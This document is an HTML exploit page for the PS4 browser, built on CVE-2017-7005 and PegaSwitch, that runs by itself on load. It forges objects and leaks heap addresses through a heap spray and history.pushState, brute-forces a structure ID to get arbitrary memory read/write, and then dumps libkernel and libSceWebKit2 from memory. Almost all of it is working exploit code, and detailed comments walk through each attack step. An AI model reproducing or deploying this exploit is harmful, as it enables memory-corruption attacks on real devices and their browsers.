  1.  
  2. <body>
  3.  
  4. <head>
  5. <script src="./data/utils/jquery.min.js"></script>
  6. <script src="./data/utils/utils.js"></script>
  7. <script src="./data/utils/utils.log.js"></script>
  8. <script src="./data/sploitcore.js"></script>
  9. <script src="./data/rop.js"></script>
  10. <script src="./data/syscalls.js"></script>
  11. <script src="./data/gadgets.js"></script>
  12. </head>
<!-- NOTE(review): this background is fetched over plain HTTP from an unrelated third-party host on every page load. It leaks the console's IP address and User-Agent to that site and makes the page depend on it being reachable; an offline payload page should ship the image under ./data/ or drop the attribute. -->
  13. <body background="http://backgroundcheckall.com/wp-content/uploads/2017/12/background-image-for-website-2.jpg">
  14. Beta
  15. <body>
  16. <center>
  17.  
  18. RE CODE By <a href="https://twitter.com/xiranozer">XiRaLxRd</a><br>
  19. Original by ALEXZZZ9<br>
  20. Based on:<br>
  21. <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1208">CVE-2017-7005</a><br>
  22. <a href="https://github.com/reswitched/pegaswitch">PegaSwitch</a> <a href="https://github.com/reswitched/pegaswitch/blob/master/LICENSE.md">(Copyright 2017 ReSwitched Team)</a><br>
  23. 4.0x exploit by <a href="https://twitter.com/qwertyoruiopz">qwertyoruiopz</a><br>
  24. <br>
  25. This exploit supports 5.01>5.05 (support Beta 5.50)
  26. Version : 1.5 <br>
  27. </center>
  28. <center id="buttons" style="visibility:hidden;">
  29. <input id="go" type="button" onclick="restart()" value="Restart"><br>
  30. <br>
  31. <input id="go" type="button" onclick="dump('libkernel')" value="Dump libkernel"><br>
  32. <input id="go" type="button" onclick="dump('libSceWebKit2')" value="Dump libSceWebKit2"><br>
  33. </center>
  34.  
  35. <div class="footer">
  36. <h5>===== COMPLETE EXPLOIT LOGS =====</h5>
  37. <pre id="log"></pre>
  38. </div>
  39.  
  40. <script>
// Driver state shared by start(), restart(), resetCount() and leakAddrs().
// Left as `var` so they remain ordinary classic-script globals.
var tryCountMax = 2;      // in-page retries allowed before falling back to a full page reload
var tryCount = 0;         // retries consumed so far; cleared by resetCount()
var done = true;          // starts true; lowered by resetCount(), raised by leakAddrs() on a hit
var mainDebugLog = true;  // gates the extra log()/debug_log() trace lines
  45.  
  46.  
// Entry point of the WebKit stage. Builds fake values through buildObject()
// (the CVE-2017-7005 primitive linked in the page header), leaks their
// addresses with leakAddrs(), brute-forces a structure ID until a fake
// Uint32Array is recognised by the engine, walks a chain of object
// references to learn the addresses of two typed-array views, and finally
// hands everything to loadCore(). Every statement below is order-dependent:
// the fake objects live inside `magic`, and the constants (0x1602300 - 0x10000,
// indices 4/5/6, 0x1337) encode this firmware's libSceWebKit2 layout, which is
// not explained anywhere in this file — do not reorder or "tidy" this code.
function start() {
  // Not declared in this file; presumably a global owned by one of the
  // ./data/*.js helpers that SploitCore re-initialises — confirm there.
  _dview = undefined;

  if (mainDebugLog) log('>> Exploit Starting .');
  buildObject(0, 0, function(b) {
    buildObject(0x1337, 0x1, function(d) {
      // `sid` is the structure-ID candidate; it is bumped below until the
      // fake object built over `magic` passes `instanceof Uint32Array`.
      var sid = 1;
      var magic = {
        'a': u2d(sid, 0x1602300 - 0x10000),
        'b': b,
        'c': u2d(1, 2),
        'd': d
      };
      // Drop the extra references so only `magic` holds the fake values.
      d = 0;
      b = 0;

      // 64-byte backing store; `rwmagic` is the view whose reads/writes are
      // redirected below, and `va`/`vb` (created later) share the same buffer.
      var bstore = new ArrayBuffer(0x10 * 4);
      var rwmagic = new Uint32Array(bstore);
      var leakee = {
        'b': null
      };
      var leaker = {
        'a': leakee
      };
      // Leaks (lo, hi) address pairs of magic, rwmagic and leaker, in that order.
      leakAddrs(magic, rwmagic, leaker, function(err, magicaddr, rwaddr, leakeraddr) {
        if (err) {
          debug_log(`>> Error leaking : ${err}`);

          tryCount += 1;

          // `done` starts true and is only lowered by resetCount(), so on a
          // fresh page load the very first failure always takes the reload
          // path; the in-page restart() retry is reachable only after a
          // previous success (or reload scheduling) in this same page load.
          if (!done && tryCount < tryCountMax) {
            debug_log(`>> Retry #${tryCount}`);
            restart();
          } else {
            debug_log(`>> Please wait for Auto Reload !`);
            resetCount();
            setTimeout(function(){
              window.location.reload(1);
            }, 5000);
          }
          return;
        }
        resetCount();

        buildObject(rwaddr[0], rwaddr[1], function(c) {
          // magic.c now carries rwmagic's address as a fake value.
          magic.c = c;
          c = 0;
          // Fake object built 16 bytes past `magic` (presumably its inline
          // property storage — confirm against the object layout). Note the
          // low word is added without carry into magicaddr[1]; fine for +16
          // unless the low word happens to sit within 16 bytes of wrapping.
          buildObject(magicaddr[0] + 4 * 4, magicaddr[1], function(o) {
            // Brute-force the structure ID: rewrite magic.a with successive
            // candidates until the engine accepts `o` as a Uint32Array.
            // Bounded at 0x10000 so a wrong layout fails instead of spinning.
            while (sid < 0x10000 && !(o instanceof Uint32Array)) {
              magic.a = u2d(++sid, 0x1602300 - 0x10000);
            }
            if (!(o instanceof Uint32Array)) {
              debug_log('>> Could not find structure ID!');
              return;
            }

            // Original contents of the three words that get redirected below;
            // they are put back once the leaks are done.
            var save = [o[4], o[5], o[6]];

            // From here on, writing an address pair into o[4], o[5] changes
            // what rwmagic[4], rwmagic[5] read back. `o` is a fake Uint32Array
            // carved out of `magic`, whose 'c' slot was just filled with
            // rwmagic's address, so the two presumably alias (o[4..5] being
            // rwmagic's data pointer and o[6] its length); the exact cell
            // layout is firmware-specific and not visible in this file.
            o[4] = leakeraddr[0];
            o[5] = leakeraddr[1];
            o[6] = 0x1337;

            // Two more views on the same 64-byte buffer; their addresses are
            // what the chain below leaks, and both are handed to SploitCore.
            var va = new Uint32Array(bstore);
            var vb = new Uint32Array(bstore);
            leaker['a'] = leakee;
            leakee['b'] = {
              'a': va
            };
            // Three hops, three reads: presumably leaker -> leakee ->
            // leakee.b -> va. Each read of rwmagic[4..5] yields the next
            // address pair, which is fed back into o[4..5].
            var leakaddr = [rwmagic[4], rwmagic[5]];

            o[4] = leakaddr[0];
            o[5] = leakaddr[1];
            var ta = [rwmagic[4], rwmagic[5]];
            o[4] = ta[0];
            o[5] = ta[1];
            var addra = [rwmagic[4], rwmagic[5]];   // address pair reached via va

            // Same walk again with vb swapped into leakee.b.
            o[4] = leakaddr[0];
            o[5] = leakaddr[1];
            leakee['b'] = {
              'a': vb
            };
            ta = [rwmagic[4], rwmagic[5]];
            o[4] = ta[0];
            o[5] = ta[1];
            var addrb = [rwmagic[4], rwmagic[5]];   // address pair reached via vb

            // Point at addra and store addrb there — presumably the write that
            // links the two views into SploitCore's read/write primitive.
            o[4] = addra[0];
            o[5] = addra[1];
            rwmagic[4] = addrb[0];
            rwmagic[5] = addrb[1];

            // Restore the redirected words, then drop references to the fake
            // objects (likely so nothing walks them later). magic.a and save
            // are deliberately kept alive — the two commented lines are
            // intentional, not dead code.
            o[4] = save[0];
            o[5] = save[1];
            o[6] = save[2];
            rwmagic = 0;
            // magic.a = 0;
            magic.b = 0;
            magic.c = 0;
            magic.d = 0;
            o = 0;
            // save = 0;
            debug_log('~~~~~~~~~~ WebKit Exploit Succeeded ~~~~~~~~~~');
            debug_log('~~~~~~~~~~ You Can Now Dump LibKernel and LibSceWebkit2 ! ~~~~~~~~~~');

            // Everything SploitCore needs: the shared buffer, both views, the
            // object that still holds {a: vb}, and the first leaked pair.
            loadCore({
              bstore: bstore,
              va: va,
              vb: vb,
              leakee: leakee,
              leakaddr: leakaddr
            });
          });
        });
      });
    });
  });
};
  165.  
/**
 * Clears the on-page log, then re-enters start() after a 100 ms delay.
 * Used both by the "Restart" button and by start()'s in-page retry path.
 */
function restart() {
  clearLog();
  setTimeout(() => start(), 100);
}
  173.  
/**
 * Resets the retry bookkeeping used by start(): no retries consumed and
 * `done` lowered, which is what allows start()'s error path to take the
 * in-page restart() branch instead of scheduling a full reload.
 */
function resetCount() {
  done = false;
  tryCount = 0;
}
  178.  
  179.  
// Returns, through cb, a single value read back from an array that holds
// the double u2d(lo, hi) in slot 2, using Array.prototype.slice taken from a
// throw-away iframe realm whose Array.prototype carries a getter at index 100.
// This is the CVE-2017-7005 primitive referenced in the page header: the
// cross-realm slice with a prototype getter in place is presumably what makes
// sub[0] come back as something other than the plain number 0 — the
// mechanism lives in WebKit, not in this file, so do not alter the array
// shape, the getter index or the slice bounds.
// If slice throws, the iframe is left attached and cb is never called; the
// caller's chain then simply stops without a log line.
function buildObject(lo, hi, cb) {
  if (mainDebugLog) log('Building stuff.');
  // The two subnormal doubles are chosen for their raw 64-bit bit patterns
  // (roughly 0x2_00000000 and 0x7), not for their numeric value.
  var a = [0, 4.243991582e-314, u2d(lo, hi), 3.5e-323, 3.5e-323];
  var f = document.body.appendChild(document.createElement('iframe'));

  // Getter at an index beyond the slice range; its return value is
  // irrelevant, its presence on the other realm's prototype is the point.
  f.contentWindow.Array.prototype.__defineGetter__(100, function() {
    return 1
  });

  var sub = f.contentWindow.Array.prototype.slice.call(a, 0, 4);

  f.remove();
  cb(sub[0]);
}
  194.  
// Leaks the addresses of obja, objb and objc. Sprays many arrays of
// [validator-double, obja, objb, objc] onto the heap, frees them, then pushes
// a 1 MB ImageData through history.pushState and scans the copy that comes
// back out of history.state for the validator marker followed by three
// pointer-sized values. Calls cb(null, [lo, hi], [lo, hi], [lo, hi]) with the
// pairs in argument order, or cb('Not Found', null, null, null).
// The result depends on the freed spray being reused by the serialiser, so
// it is probabilistic — which is why start() retries or reloads on 'Not Found'.
function leakAddrs(obja, objb, objc, cb) {
  if (mainDebugLog) log('Attempting leak...');
  var numbufs = 100 * 8;       // slots per sprayed array (200 quads of 4)
  var numchunks = 5000;        // number of sprayed arrays
  var chunks = new Array(numchunks);
  // Random 16-bit marker so a stale hit from an earlier attempt is not
  // mistaken for this one. Math.random() is adequate: the value only needs
  // to be distinct per attempt, not unpredictable.
  var validator = ~~(Math.random() * 0x10000);
  var vj = u2d(validator, 0);

  if (mainDebugLog) log(`validator=0x${validator.toString(16)}`);

  // Scans the pixel buffer of `state` (the ImageData read back from
  // history.state) for the quad pattern written by the spray below.
  function checkState(state) {
    if (mainDebugLog) log('Checking...');
    // width*height is already the number of 32-bit pixels, i.e. the length of
    // `rb`; dividing by 4 again means only the first quarter of the buffer is
    // scanned (256 KB of the 1 MB image). NOTE(review): unclear whether that
    // cut-off is intentional or a bytes-vs-pixels mix-up; widening it would
    // cost only scan time.
    var elementCount = state.width * state.height / 4;
    var rb = new Uint32Array(state.data.buffer);
    var f = false;   // unused
    for (var i = 0; i < elementCount; ++i) {
      // Expected layout of one sprayed quad as 32-bit words:
      //   [i] validator, [i+1] 0x10000 — the high word the engine stores for
      //   the boxed double u2d(validator, 0), presumably JSC's NaN-boxing
      //   offset (1 << 48) on this WebKit build; a build with a different
      //   encoding would never match,
      //   [i+2..3] obja, [i+4..5] objb, [i+6..7] objc (lo, hi each).
      // The remaining checks reject zero or duplicate pointers and require
      // the high words to be below 0x100 (plausibly the expected range of
      // user-space heap addresses on this target).
      if (rb[i] === validator && rb[i + 1] === 0x10000 &&
        rb[i + 2] !== 0 && rb[i + 4] !== 0 && rb[i + 6] !== 0 &&
        rb[i + 2] !== rb[i + 4] && rb[i + 3] < 0x100 && rb[i + 5] < 0x100
      ) {
        if (mainDebugLog) debug_log('Found data. ' + i);

        // Records success for start()'s retry logic: after this, a later
        // failure in the same page load may be retried in-page.
        done = true;

        if (mainDebugLog) {
          var tmpArr = [];

          for (var j = 0; j < 12; ++j) {
            tmpArr.push(`0x${rb[i + j].toString(16)}`);
          }

          debug_log(`data=${JSON.stringify(tmpArr)}`);
        }

        return cb(null, [rb[i + 2], rb[i + 3]], [rb[i + 4], rb[i + 5]], [rb[i + 6], rb[i + 7]]);
      }
    }

    return cb('Not Found', null, null, null);
  }

  // 1 MB image (1 x 262144 pixels x 4 bytes). Allocated before the spray;
  // it is the serialised copy produced after the spray is freed that is
  // presumably expected to pick up the freed arrays' contents.
  var id = new ImageData(1, 1 * 1024 * 1024 / 4);

  if (mainDebugLog) log('Allocating...');
  // Spray: 5000 arrays of 800 slots, every 4 slots = [vj, obja, objb, objc].
  for (var j = 0; j < numchunks; ++j) {
    var bufs = chunks[j] = new Array(numbufs);
    for (var i = 0; i < numbufs; i += 4) {
      bufs[i] = vj;
      bufs[i + 1] = obja;
      bufs[i + 2] = objb;
      bufs[i + 3] = objc;
    }
    bufs = 0;
  }
  // Release the spray so its storage becomes reusable.
  for (var j = 0; j < numchunks; ++j) {
    delete chunks[j];
  }
  // Transfer the image's buffer away (the message body is empty, so the '*'
  // target origin discloses nothing), then push the ImageData into history
  // state and read it back as a fresh copy on the next macrotask; that
  // reconstructed pixel data is what checkState() inspects. Why the transfer
  // is required is not explained here — presumably it is what makes the
  // serialiser read from reused memory.
  postMessage('', '*', [id.data.buffer]);
  history.pushState(id, '');
  setTimeout(function() {
    checkState(history.state);
  }, 0);
}
  258.  
  259.  
/**
 * Instantiates SploitCore over the objects leaked by start(), publishes it as
 * window.ECore (the dump buttons read it from there), and reveals the button
 * bar by removing its inline `visibility:hidden` style attribute.
 * @param {{bstore: ArrayBuffer, va: Uint32Array, vb: Uint32Array, leakee: object, leakaddr: number[]}} obj
 */
function loadCore(obj) {
  debug_log('~~~~~~~~~~Loadig Exploit Core~~~~~~~~~~');
  window.ECore = new SploitCore(obj);

  const buttonBar = document.getElementById("buttons");
  buttonBar.removeAttribute("style");
}
  267.  
  268.  
/**
 * Dumps a module out of the exploited process through ECore.memDump
 * (ECore is set up by loadCore()).
 *   'libkernel'     -> one 0x7FFFF-byte dump from the base recorded in
 *                      ECore.moduleBaseAddresses, written to libkernel.sprx.
 *   'libSceWebKit2' -> 60 consecutive dumps from ECore.base into
 *                      libSceWebKit2.sprx: #1-#18 are 3 MB each, #19-#60 are
 *                      128 KB each. The 4th memDump argument is `true` here
 *                      and `false` for libkernel — presumably an append flag;
 *                      check sploitcore.js.
 * Any other module name does nothing.
 *
 * NOTE(review): the 128 KB size takes effect before the offset is advanced,
 * so dump #19 starts only 128 KB past the start of dump #18, and #19-#41
 * re-read memory #18 already covered. The hard-coded counts look empirically
 * tuned to this firmware (reading further could hit unmapped pages), so the
 * exact sequence is reproduced here rather than "fixed"; whoever reassembles
 * the file must de-duplicate that range.
 * @param {'libkernel'|'libSceWebKit2'} module
 */
function dump(module) {
  const chunk128KB = (0x10 * 64) * 128;
  const chunk3MB = (0x10 * 64) * 128 * 8 * 3;

  if (module === 'libkernel') {
    ECore.memDump(window.ECore.moduleBaseAddresses['libkernel'], 0x7FFFF, `libkernel.sprx`, false);
    return;
  }
  if (module !== 'libSceWebKit2') {
    return;
  }

  const base = ECore.base;
  let size = chunk3MB;
  let offset = 0;
  for (let n = 1; n <= 60; n++) {
    if (n === 19) {
      size = chunk128KB;
    }
    if (n > 1) {
      offset += size;
    }
    debug_log(`Dump #${n} (Address:${paddr(add2(base, offset))} | Offset:${offset} | Size: ${size})`);
    ECore.memDump(add2(base, offset), size, `libSceWebKit2.sprx`, true);
  }
}
  304. </script>
  305.  
  306. <script>
// Auto-start: 100 ms after load, click the first element with id="go".
// Three inputs share that id (invalid HTML); getElementById returns the first
// in document order — the "Restart" button, whose onclick runs restart() and
// therefore start(). Reordering the buttons would change what auto-runs.
setTimeout(() => {
  document.getElementById('go').click();
}, 100);
  310. </script>
  311. </body>
  312. </body>